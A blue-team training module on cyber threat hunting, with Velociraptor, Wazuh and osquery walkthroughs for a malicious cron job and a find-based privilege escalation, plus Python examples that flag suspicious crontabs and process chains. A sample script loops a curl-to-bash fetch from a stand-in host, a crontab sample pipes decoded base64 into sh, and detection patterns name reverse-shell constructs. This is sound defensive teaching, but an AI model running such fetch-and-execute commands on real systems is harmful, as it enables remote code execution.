Blue Team Fundamentals Module 04

The document provides an overview of proactive cyber threat hunting, detailing its processes, roles, and tools used for detecting and mitigating cyber threats. It emphasizes the importance of creating hypotheses, investigating with various tools, and uncovering new attack patterns to enhance detection capabilities. Additionally, it discusses specific threat hunting scenarios such as scheduled tasks and privilege escalation, outlining steps for investigation and analysis.

CYBERWARFARE LABS

Blue Team Fundamentals
Module : 04 | CYBER THREAT HUNTING
PROACTIVE CYBER THREAT HUNTING
INTRODUCTION TO PROACTIVE CYBER THREAT HUNTING
● Cyber threat hunting is a proactive and iterative process of searching for, detecting, and mitigating cyber threats within a network environment.
● Threat hunting goes beyond traditional security measures, which primarily focus on preventing, detecting, and responding to known and unknown cyber threats.

Topics covered in this module:
● General overview of CTH
● Roles & Working of CTH
● Hunting cyber threats with OSquery
● Foundational overview about MITRE ATT&CK framework
● Cyber Kill Chain
General overview of Threat Hunting
General overview of Cyber Threat Hunting

Cyber Threat Hunting generally falls under proactive defensive measures.

The ultimate goal of CTH is to identify and eliminate cyber attacks that generally evade cyber defences and perform stealthier operations.

Establishing an effective cyber threat hunting team gives the organisation better detection against advanced cyber threats.

Threat hunting is a hypothesis-driven form of investigation and detection; following such an approach gives us better visibility into, and understanding of, the attacker's end goal.
General overview of Cyber Threat Hunting

The general hierarchy of threat hunting is handled by a group of experts with a strong skill set in both offensive and defensive security.

This particular threat hunting role is not recommended for beginners.
General overview of Threat Hunting

Threat Hunting teams generally operate under a general shift and are:
● Involved in developing various hypotheses
● Creating and hunting for known and unknown cyber threats
● Contributing to the enhancement of overall cyber defence

Threat hunting often involves collaboration with several other security teams, such as SOC, Incident Response, and Forensics, to identify and determine the criticality and patterns of various threats.
Working of Threat Hunting
Working of Threat Hunting
Life Cycle of Cyber Threat Hunting

Cyber threat hunting often involves iterative loops and continuous refinement of strategies based on the evolving threat landscape and organizational changes.

The various phases of Cyber Threat Hunting include:
1. Creating Hypothesis
2. Investigating with Tools & Techniques
3. Uncover new patterns
4. Enhance the detection

Life cycle diagram (the four stages as labelled):
● Create Hypothesis: creating various hypotheses based on known and emerging cyber attacks
● Investigate with tools & Techniques: investigate the hypothesis using various tools and technology
● Uncover new patterns: uncover and determine various attack patterns, which include IOCs, IOAs, etc.
● Enhance the Detection: enhance the overall detection based on the findings
Creating Hypothesis
The initial part of a cyber threat hunt begins with creating a threat hunting hypothesis; this hypothesis guides the analyst along their complete investigative path.

Some commonly created hypotheses are listed below:

1. Create a hunt for suspicious scheduled tasks
2. Create a hunt for SUID based exploits
3. Create a hunt for botnet based attacks
4. Create a hunt for detected privilege escalation activity
5. Create a hunt for observed APT based patterns

The hunt situations mentioned are designed for your basic understanding; based on the organization's business model, emerging cyber threats and the threat landscape, these hypotheses change frequently.
Investigating with Tools & Techniques
The next phase of threat hunting is to investigate the created hypothesis with various tools and technology. Effective threat hunting often involves a combination of these tools and techniques. Listed below are some commonly used threat hunting tools:
1. HELK
2. APT-Hunter
3. Thor APT Scanner
4. DeepBlueCLI
5. LOKI
6. Velociraptor
Uncover New Attack pattern
Effective operation of tools and techniques will generally uncover new malicious patterns of behavior and adversary TTPs.

If an effective hypothesis has been framed and explored through the hunt operations, the results help us identify new intel feeds, which include IOCs, IOAs, adversary patterns, etc.
Enhance the Detection
By combining these strategies and assessments, organizations can enhance their ability to identify and respond to a wide range of security threats.

It is recommended to continuously refine and expand threat hunting hypotheses based on new threat intelligence and insights gained from previous investigations.
Threat Hunting Working : Phase 01
Threat Hunting Working : Phase 02
Threat Hunting Working : Phase 03
Scheduled Task/Job
Threat Hunting Demo
What is Schedule Task/Job
A scheduled task/job is simply a process of executing malicious code recurrently on the targeted victim.

After gaining successful initial access, the adversary generally tries to maintain stable persistence on the targeted victim.
Working of Schedule Task/Job
Let us assume a scenario where the attacker is trying to maintain a stable shell on the targeted victim. To achieve that, the attacker might create a scheduled task which constantly initiates a connection to the attacker's C2; even if the connection is accidentally dropped, the scheduled task re-initiates the process and connects back to the C2.
Demo
Hypothesis
The hypothesis aims to conduct a thorough investigation into a suspected scheduled task incident, with the goal of identifying the source, scope, and impact of the attack, and implementing measures to prevent future occurrences.
Scheduled Task/Job Threat Hunting Approach

To enhance threat hunt capabilities, listed below are some approaches and techniques to uncover or identify suspicious scheduled tasks.

1. Identify and retrieve the list of Scheduled tasks
2. Investigate the attachments
3. Identify and determine the suspected activity
4. Retrieve the detected script file
5. Static File Analysis
6. Dynamic File Analysis
7. Analyse File Content
8. Check for Network Connections
Step:01
The first step of the investigation begins by investigating the activity via DFIR solutions; in our demonstration we will be performing the threat hunt with the tool named Velociraptor.
Step:02 : Identify and retrieve the list of Scheduled task

To identify and retrieve them, we perform a simple Velociraptor hunt. Follow the steps mentioned below and observe the results.

1. Create a NEW HUNT
2. Selecting the artifacts
3. Configuring Parameters
4. Review request

By following such an approach we can successfully enumerate all scheduled tasks on relevant systems and analyze their properties.
Step:02 : Create a NEW HUNT

To perform a HUNT it is recommended to provide a detailed description and the remaining details such as the expiry date; keeping such a record helps us track the hunt details.
Step:02 : Selecting the artifacts
In general, an artifact is simply a structured YAML file containing a query, with a name attached to it.

This allows Velociraptor users to search for the query by name or description and simply run the query on the endpoint without necessarily needing to understand or type the query into the UI.

It is always recommended to select the appropriate Velociraptor query; for our operation we will prefer using the [Link] artifact to retrieve and list all crontabs.
Step:02 : Configuring Parameters
Configuring parameters allows us to customise results to meet our specific requirements. Mention the observed file path to retrieve detailed information about it.

Use the below parameters to retrieve cronTabGlob:
/etc/crontab,/etc/cron.d/**,/var/at/tabs/**,/var/spool/cron/**,/var/spool/cron/crontabs/**

Use the below parameters to retrieve cronTabScripts:
/etc/[Link]/*,/etc/[Link]/*,/etc/[Link]/*,/etc/[Link]/*
Step:02 : Review request

After all the configuration it is recommended to review it one final time before executing the launch.
Step:02 : Result
As per the result we identified multiple cron jobs on every host; it is recommended to check each and every host's result to identify the suspected activity.
Step:02 : Result
Analyze the properties of scheduled tasks, focusing on tasks with suspicious or non-standard configurations, such as obfuscated command-line arguments, unexpected triggers, or unusual file paths.

Detected File Name: [Link]

Detected File Path: /home/bt-emp01/Desktop/testing/[Link]
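The property checks this step describes (unusual file paths, unexpected triggers, obfuscated command-line arguments), as an added Python example that is not part of the original deck and is not Velociraptor code. It parses crontab text in the two formats the cronTabGlob paths above cover (system crontabs with a user column, per-user spool files without one) and attaches a flag for each suspicious property. The crontab contents, the user directory and the file name placeholder.sh are constructed sample data; the page redacts the real script name.

```python
import re
import shlex
from dataclasses import dataclass, field
from typing import Dict, List

# Files under the spool directories of the cronTabGlob parameter are per-user
# crontabs: they carry no user column, the file name is the user.
USER_CRONTAB_PREFIXES = ("/var/spool/cron/", "/var/at/tabs/")
# Locations a legitimate system job rarely runs from.
NON_SYSTEM_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
# Constructs that hide what really runs or hand decoded text to a shell.
OBFUSCATION_RE = re.compile(r"base64|\|\s*(?:ba)?sh\b|\beval\b|\$\(", re.IGNORECASE)

# Constructed sample crontab contents (hypothetical, not data from the page);
# placeholder.sh stands in for the script name the page redacts.
SAMPLE_CRONTABS = {
    "/etc/crontab": (
        "# /etc/crontab: system-wide crontab\n"
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "17 *\t* * *\troot\tcd / && run-parts --report /etc/cron.hourly\n"
        "25 6\t* * *\troot\ttest -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )\n"
    ),
    "/etc/cron.d/backup": "0 2 * * * root /usr/local/bin/backup.sh\n",
    "/var/spool/cron/crontabs/bt-emp01": (
        "* * * * * /home/bt-emp01/Desktop/testing/placeholder.sh\n"
        "@reboot echo dGVzdA== | base64 -d | sh\n"
    ),
}


@dataclass
class CronEntry:
    source: str
    user: str
    schedule: str
    command: str
    flags: List[str] = field(default_factory=list)


def parse_crontab(path: str, text: str) -> List[CronEntry]:
    """Parse one crontab file into entries, handling both crontab dialects."""
    user_crontab = path.startswith(USER_CRONTAB_PREFIXES)
    default_user = path.rsplit("/", 1)[-1] if user_crontab else "?"
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue  # blank line, comment, or environment assignment
        if line.startswith("@"):  # @reboot, @daily, ... carry a single schedule field
            parts = line.split(None, 1)
            schedule, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed: fewer than five time fields plus a command
            schedule, rest = " ".join(parts[:5]), parts[5]
        if user_crontab:
            user, command = default_user, rest
        else:
            user_parts = rest.split(None, 1)
            if len(user_parts) < 2:
                continue
            user, command = user_parts
        entries.append(CronEntry(path, user, schedule, command))
    return entries


def flag_entry(entry: CronEntry) -> None:
    """Attach hunt flags for the properties the step above calls suspicious."""
    if entry.schedule == "* * * * *":
        entry.flags.append("runs_every_minute")          # beacon-like trigger
    if entry.schedule.startswith("@reboot"):
        entry.flags.append("reboot_trigger")             # persistence trigger
    try:
        tokens = shlex.split(entry.command)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = entry.command.split()
    if any(t.startswith(NON_SYSTEM_PREFIXES) for t in tokens):
        entry.flags.append("non_system_path")
    if OBFUSCATION_RE.search(entry.command):
        entry.flags.append("obfuscation_or_pipe_to_shell")


def hunt_crontabs(crontabs: Dict[str, str]) -> List[CronEntry]:
    """Return only the entries that received at least one flag."""
    suspicious = []
    for path, text in crontabs.items():
        for entry in parse_crontab(path, text):
            flag_entry(entry)
            if entry.flags:
                suspicious.append(entry)
    return suspicious


if __name__ == "__main__":
    for e in hunt_crontabs(SAMPLE_CRONTABS):
        print(f"{e.source}: user={e.user} schedule='{e.schedule}' flags={e.flags}\n    {e.command}")
```

Running it on the sample reports only the two entries from the bt-emp01 spool file: the every-minute job under /home and the @reboot job that decodes base64 into a shell. The benign system entries produce no flags, which is the property a hunt over hundreds of hosts needs.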
Step:03 : Retrieve the detected script file

To identify and determine the file hash, we proceed with another simple Velociraptor hunt. Follow the steps mentioned below and observe the results.

To perform a HUNT it is recommended to provide a detailed description and the remaining details such as the expiry date; keeping such a record helps us track the hunt details.
Step:03 : Selecting the artifacts
In general, an artifact is simply a structured YAML file containing a query, with a name attached to it.

This allows Velociraptor users to search for the query by name or description and simply run the query on the endpoint without necessarily needing to understand or type the query into the UI.

It is always recommended to select the appropriate Velociraptor query; for our operation we will prefer using the [Link] artifact to retrieve and investigate the observed file.
Step:03 : Configuring Parameters
Configuring parameters allows us to customise results to meet our specific requirements. Mention the observed file path to retrieve detailed information about it.

Use the below parameters to retrieve cronTabGlob:
/home/bt-emp01/Desktop/testing/[Link]
Step:03 : Review request

After all the configuration it is recommended to review it one final time before executing the launch.
Step:03 : Result
As per the result we identified that the host BT-EMP01 contains the detected file. On digging deeper into the result, we observed the HASH of the detected file under the result section.
Step:03 : Result
Determining the hash of a detected suspected file is a crucial step in cybersecurity. Hash values provide a unique and consistent identifier for files. In the context of malicious files, this enables security professionals to catalogue and share information about specific threats based on their hash values.

Detected File Hash: 36a4f7be20e62d79a09937af72e99777f277938394532b5d8a9cb2de19b869e5
Step:04 : Static File Analysis

Static file analysis involves examining the characteristics and content of a file without executing or running it. This type of analysis provides insights into the file's structure, metadata, code, and potential security risks.

Online security tools such as VirusTotal use hash values to create signatures for known malware. By comparing the hash of a file against a database of malicious hashes, security solutions can quickly identify threats.

Navigate to the [Link] and submit the detected HASH.
Step:04 : Static File Analysis
As per the VT result we observed that the detected file hash does not match any hashes from suspicious reports.

Note: In the majority of cases, hash-based investigation will fail and simply return a clean status. In such cases it is recommended to proceed with investigating the file via dynamic analysis.
Step:05 : Dynamic File Analysis
Download the suspected file and submit it to one or more reputable antivirus or anti-malware tools. Many antivirus programs can detect known malware signatures.

Using Velociraptor we can directly download the detected file to our local machine for further analysis.
Step:05 : Dynamic File Analysis

It is recommended to download the file into a sandbox/isolated environment. A sandbox environment is an isolated and controlled space designed to analyze and execute potentially malicious code without affecting the production network or systems.
Step:05 : Dynamic File Analysis

After downloading or retrieving the suspected file it is recommended to upload the detected file to VT to observe the findings for it.

As per VT, the detected activity appears to be a legitimate function.
Step:06 : Analyse File Content

The next step of the investigation is to open the detected file in a text editor and carefully review the script's content. Look for any suspicious or unfamiliar commands, functions, or code snippets.
Open the .sh file using a text editor such as VS Code, nano, vim or gedit in a secure, isolated environment.

As per the result we identified that external communication is being invoked within the script.
Step:07 : Check for Network Connections

As per our dynamic analysis the detected malicious script is trying to communicate with the detected attacker IP [168[.]126[.]4[.]93] via port 6666, hence it is recommended to cross-verify the network connections.

Examine network logs for any corresponding increases in outbound traffic during the execution of suspicious scheduled tasks. This could indicate communication with external servers.
Step:08 : Check for Network Connections
Based on our findings, craft a search request in a network monitoring tool, execute the below mentioned filter and observe the findings.

[Link] == [Link] && [Link] == [Link] && [Link] == 6666
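Steps 03 and 06 to 08 above (hash the retrieved file, review the script for outbound communication, extract the IP and port, and build the network filter), as an added Python example that is not part of the original deck. It computes the SHA-256 the hash lookup needs, scans the script text for the kinds of constructs a reviewer looks for, pulls every IPv4:port pair out as an IOC, defangs it in the page's bracket notation, and emits a display filter. The sample script is constructed and uses the documentation address 192.0.2.10 in place of the page's attacker IP; the filter assumes Wireshark/tshark display-filter syntax (ip.addr, tcp.port), since the page redacts the field names of its own filter.

```python
import hashlib
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructs that signal an outbound or hidden execution path in a shell script.
INDICATORS = [
    ("dev_tcp_socket", re.compile(r"/dev/(?:tcp|udp)/")),
    ("interactive_shell", re.compile(r"\b(?:ba)?sh\s+-i\b")),
    ("netcat_exec", re.compile(r"\b(?:nc|ncat|netcat)\b[^\n]*\s-e\s")),
    ("download_to_shell", re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b")),
    ("base64_decode", re.compile(r"base64\s+(?:-d|--decode)\b")),
    ("retry_loop", re.compile(r"\bwhile\s+(?:true|:)\s*;")),
]
# IPv4 followed by a port, in host:port form or the /dev/tcp/host/port form.
IP_PORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})[:/](\d{1,5})\b")

# Constructed sample script (hypothetical, not the file from the page): it keeps
# re-establishing an outbound fetch the way the deck's scenario describes.
SAMPLE_SCRIPT = b"""#!/bin/bash
while true; do
  curl -s http://192.0.2.10:6666/task | bash
  sleep 60
done
"""


@dataclass
class ScriptReport:
    sha256: str
    findings: List[str] = field(default_factory=list)
    iocs: List[Tuple[str, int]] = field(default_factory=list)


def sha256_hex(data: bytes) -> str:
    """Hash value to submit to a reputation service (Step 03 / Step 04)."""
    return hashlib.sha256(data).hexdigest()


def analyze_script(data: bytes) -> ScriptReport:
    """Static review of script content: indicator hits plus extracted IP:port IOCs."""
    text = data.decode("utf-8", errors="replace")
    report = ScriptReport(sha256=sha256_hex(data))
    for name, pattern in INDICATORS:
        if pattern.search(text):
            report.findings.append(name)
    for ip, port in IP_PORT_RE.findall(text):
        octets_ok = all(0 <= int(o) <= 255 for o in ip.split("."))
        ioc = (ip, int(port))
        if octets_ok and 0 < ioc[1] <= 65535 and ioc not in report.iocs:
            report.iocs.append(ioc)
    return report


def defang(ip: str) -> str:
    """Write the address the way the deck does, so it is not clickable in reports."""
    return ip.replace(".", "[.]")


def display_filter(ip: str, port: int) -> str:
    # Assumed Wireshark/tshark display-filter syntax for the Step 08 search.
    return f"ip.addr == {ip} && tcp.port == {port}"


if __name__ == "__main__":
    rep = analyze_script(SAMPLE_SCRIPT)
    print("sha256  :", rep.sha256)
    print("findings:", rep.findings)
    for ip, port in rep.iocs:
        print("ioc     :", defang(ip), port)
        print("filter  :", display_filter(ip, port))
```

The indicator list is deliberately small and readable: each entry names the behaviour it matches, so a hit in the report tells the analyst what to look at in the editor rather than replacing that reading.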


Privilege Escalation
Threat Hunting Demo
What is Privilege Escalation
Privilege escalation is the process of escalating from a lower privilege to a higher one in order to increase control over a compromised system.

It generally involves elevating one's privileges beyond the normal or intended level, often to execute unauthorized actions or access sensitive information.
Working of Privilege Escalation
Let us assume a scenario where the attacker has successfully logged into the enterprise with a low privilege user; if any vulnerable high privilege service is later identified, the attacker can easily elevate from the low privilege user to a higher privileged user.
Demo
Hypothesis
This hypothesis aims to investigate potential methods employed by threat actors to elevate privileges and gain unauthorized access to sensitive resources.
Step:01
The first step is to conduct an investigation using the SIEM | Wazuh Console.
Privilege Escalation Threat Hunting Approach

To enhance threat hunt capabilities, listed below are some approaches and techniques to uncover or identify suspicious privilege escalation activity.

1. Checking the root login activity
2. Identify the command execution associated with the activity
3. Retrieve the list of processes where the EUID != UID
4. Determine the command executed on behalf of the “Find” Process
5. Determine the root cause of the entire process
6. Identify the external IP associated with the SSH connection
Step:01 : Checking the root login activity
Our initial investigation begins by checking the root login activity on the host; by executing the below query on the SIEM (ELK) we can observe all root authentications from the host machine.

Command:

predecoder.program_name: sudo and location: /var/log/[Link]

Step:02 : Identify the command execution associated with the activity
After determining the root login activity, execute the below query to determine the event which either executed or triggered the execution of the root activity.
Command:

predecoder.program_name: sudo and location: /var/log/[Link] and [Link]: emp01

Step:02 : Identify the command execution associated with the activity
From the result below we observed 2 root login activities initiated by the user emp01 via the service named find.

Note: For better visualization use the Visualize section.
Step:03 : Retrieve the list of processes where the EUID != UID

Osquery is an open-source, cross-platform endpoint security and monitoring tool developed by Facebook.

Osquery provides a standardized and structured way to retrieve information about the configuration, performance, and security of endpoints (e.g., desktops, laptops, servers) in a network.
Step:03 : Retrieve the list of processes where the EUID != UID

The next step of the investigation is to retrieve the list of processes where the EUID is not equal to the UID. Execute the below query to observe the result.

SELECT parent,pid,uid,name,euid from processes where uid!=euid;

Step:04 : Command executed on behalf of the “Find” Process

As per our previous result we identified that the find process has been executed with privileges beyond its original user's privileges. Use the below query to retrieve the list of commands executed on behalf of the “Find” process.

SELECT parent,pid,shell_history.command,[Link] FROM shell_history LEFT JOIN processes ON shell_history.uid = [Link] where euid!=[Link] and command LIKE "%find%";
Step:05 : Determine the root cause of the entire process

After observing the findings, we can investigate the root cause of the entire process. For determining the root cause it is recommended to investigate the parent process chain to determine the execution flow; use the custom query mentioned below to determine the execution flow.

WITH RECURSIVE ProcessChain AS (SELECT [Link],[Link] AS parent_pid,[Link],[Link],cast([Link] as varchar(10)) AS chain,cast([Link] as varchar(10)) AS uid_chain FROM processes AS p WHERE [Link] = '14241' UNION ALL SELECT [Link],[Link] AS parent_pid,[Link],[Link],[Link] || '->' || cast([Link] as varchar(10)),pc.uid_chain || '->' || cast([Link] as varchar(10)) FROM processes AS p JOIN ProcessChain AS pc ON [Link] = pc.parent_pid) SELECT pid, parent_pid, name, uid, chain, uid_chain FROM ProcessChain ORDER BY chain;
Step:05 : Determine the root cause of the entire process
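Steps 03 and 05 above, as an added Python example that is not part of the original deck and not osquery code. It reproduces, on rows shaped like the osquery processes table, the uid != euid filter and the recursive ProcessChain query (the same pid-first chain and uid_chain strings), and goes one step further than the page's query by walking the chain from the root down to report the first process at which the effective UID diverged from the real UID, which is the root-cause process the step is looking for. The process rows are constructed; the starting pid 14241 is reused from the page's query, everything else is made up.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    """One row of SELECT parent,pid,uid,name,euid FROM processes."""
    pid: int
    parent: int
    name: str
    uid: int
    euid: int


# Constructed rows (hypothetical): an SSH session whose shell started a process
# that runs with effective root while its real UID is still the user's.
SAMPLE_PROCESSES = [
    Proc(1, 0, "systemd", 0, 0),
    Proc(812, 1, "sshd", 0, 0),
    Proc(4953, 812, "sshd", 1001, 1001),
    Proc(4960, 4953, "bash", 1001, 1001),
    Proc(14241, 4960, "find", 1001, 0),    # pid taken from the page's query
    Proc(14250, 14241, "sh", 1001, 0),
    Proc(2001, 1, "cron", 0, 0),
    Proc(2010, 2001, "sh", 1001, 1001),
]


def index_by_pid(procs: List[Proc]) -> Dict[int, Proc]:
    return {p.pid: p for p in procs}


def euid_mismatch(procs: List[Proc]) -> List[Proc]:
    """Step 03: processes whose effective UID differs from their real UID."""
    return [p for p in procs if p.uid != p.euid]


def process_chain(by_pid: Dict[int, Proc], pid: int, max_depth: int = 64) -> List[Proc]:
    """Step 05: follow parent links from pid towards init, like the recursive CTE.
    Stops at a missing parent, a cycle, or max_depth, so bad data cannot loop."""
    chain: List[Proc] = []
    seen = set()
    current = by_pid.get(pid)
    while current is not None and current.pid not in seen and len(chain) < max_depth:
        chain.append(current)
        seen.add(current.pid)
        current = by_pid.get(current.parent)
    return chain


def chain_strings(chain: List[Proc]) -> Tuple[str, str]:
    """The chain and uid_chain columns the page's query builds with '->'."""
    return ("->".join(str(p.pid) for p in chain),
            "->".join(str(p.uid) for p in chain))


def find_privilege_boundary(chain: List[Proc]) -> Optional[Proc]:
    """Walk from init down to the leaf and return the first process where the
    effective UID stops matching the real UID: the point privilege was gained."""
    for p in reversed(chain):
        if p.uid != p.euid:
            return p
    return None


def report(procs: List[Proc]) -> List[Tuple[int, str, str, Optional[int]]]:
    """For every mismatched process: (pid, chain, uid_chain, boundary pid)."""
    by_pid = index_by_pid(procs)
    rows = []
    for p in euid_mismatch(procs):
        chain = process_chain(by_pid, p.pid)
        c, u = chain_strings(chain)
        boundary = find_privilege_boundary(chain)
        rows.append((p.pid, c, u, boundary.pid if boundary else None))
    return rows


if __name__ == "__main__":
    for row in report(SAMPLE_PROCESSES):
        print(row)
```

The euid_chain is the column worth adding to the page's query in practice: reading uid_chain alone, every process in the sample chain shows uid 1001 until sshd, so the point where effective privilege changed is only visible once real and effective UIDs are compared per process, which is what find_privilege_boundary does.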
Step:06 : External IP associated with SSH connection

From our previous result we observed an SSH connection; for deeper checking of the SSH activity use the below query to retrieve the activity with the observed PID.

SELECT parent,[Link],username, host FROM last JOIN processes ON [Link] = [Link] where [Link]=4953731;
Foundational overview
about MITRE ATT&CK
framework
Foundational overview about MITRE ATT&CK framework
The MITRE ATT&CK framework is a comprehensive matrix of tactics and techniques used by threat hunters, red teamers, and defenders to better classify attacks and assess an organization's risk.

The aim of the framework is to improve post-compromise detection of adversaries in enterprises by illustrating the actions an attacker may have taken.
Foundational overview about MITRE ATT&CK framework
The primary objectives of the MITRE ATT&CK framework are as follows:
● Threat hunting and knowledge sharing
● Security assessment and gap analysis
● Incident detection and response
● Red and Blue Team

The MITRE ATT&CK framework is continually updated and expanded to include new threat actor
behavior and evolving attack techniques, making it a valuable resource for organizations seeking to
enhance their cybersecurity defenses and threat intelligence capabilities.
Key Components of Mitre Att&ck

MITRE ATT&CK plays a significant role in enhancing cyber threat hunting capabilities by providing a standardized framework for understanding and categorizing the tactics, techniques, and procedures (TTPs) employed by adversaries.

Key components shown in the diagram: Campaigns, Groups and Software, centred on MITRE ATT&CK.
Cyber Kill Chain
Overview of Cyber Kill Chain

The Cyber Kill Chain is a concept developed by Lockheed Martin that describes the stages of a cyber attack, from the initial reconnaissance to the exfiltration of data.

The goal of the Cyber Kill Chain is to help organizations better understand the attack lifecycle, enhance threat intelligence, and develop more effective cybersecurity strategies.
Overview of Cyber Kill Chain

Organizations often use the Cyber Kill Chain to inform their cybersecurity strategies,
enhance threat detection capabilities, and develop proactive defense measures to disrupt
or prevent attacks at various stages of the kill chain.
Thank You
For Professional Red Team / Blue Team / Purple Team / Cloud Cyber Range labs / Trainings, please contact

support@[Link]
To know more about our offerings, please visit: [Link]